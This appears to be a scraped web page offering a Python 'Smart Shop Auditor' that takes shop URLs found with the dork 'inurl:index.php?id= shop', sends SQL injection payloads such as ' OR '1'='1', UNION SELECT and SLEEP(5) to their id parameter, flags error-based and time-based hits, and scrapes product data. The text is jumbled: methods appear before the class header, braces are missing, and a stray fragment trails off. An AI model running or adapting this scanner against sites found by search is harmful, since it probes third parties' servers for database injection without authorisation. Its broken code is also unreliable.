def test_sql_injection(self, url, param='id'): """Test for basic SQL injection vulnerabilities""" payloads = [ ("'", "SQL syntax|mysql|ORA|PostgreSQL|SQLite"), ("' OR '1'='1", "You have an error|Warning: mysql"), ("' UNION SELECT NULL--", "union|SELECT"), ("1 AND SLEEP(5)", "response time > 3 seconds") ] print(f"[*] Testing SQLi on url") for payload, signature in payloads: test_url = url.replace(f"param=self._get_param_value(url, param)", f"param=payload") try: start = time.time() response = self.session.get(test_url, timeout=10) elapsed = time.time() - start # Check for time-based injection if "SLEEP" in payload and elapsed > 3: self._report_vulnerability('SQL Injection (Time-based)', test_url) # Check for error-based injection if any(keyword.lower() in response.text.lower() for keyword in signature.split('|')): self._report_vulnerability('SQL Injection (Error-based)', test_url) except Exception as e: print(f" [!] Error testing payload payload: e")
def extract_product_info(self, url): """Extract product details from a shop page""" try: response = self.session.get(url, timeout=5) soup = BeautifulSoup(response.text, 'html.parser') product = 'url': url, 'title': self._extract_title(soup), 'price': self._extract_price(soup), 'description': self._extract_description(soup), 'images': self._extract_images(soup, url) if product['title']: self.products.append(product) print(f"[✓] Extracted: product['title'] - product['price']") return product except Exception as e: print(f"[!] Failed to extract url: e") return None inurl index php id 1 shop
This transforms a simple search pattern into a powerful, actionable security and data extraction tool. Feature Name: Smart Parameter Fuzzer & Security Auditor
This pattern typically indicates a website with a numeric id parameter in the URL (e.g., product pages, category listings). A powerful feature to build is a for security auditing and content aggregation. Feature Name: Smart Parameter Fuzzer & Security Auditor Core Functionality This tool automates testing for common web vulnerabilities (SQLi, XSS, IDOR) on URLs matching the index.php?id=X shop pattern, while also extracting product data. Python Script Implementation import requests from bs4 import BeautifulSoup from urllib.parse import urljoin, parse_qs, urlparse import time import sys class SmartShopAuditor: """ Automated security & data extraction tool for shop URLs Pattern: inurl:index.php?id=123 shop """ ("' OR '1'='1"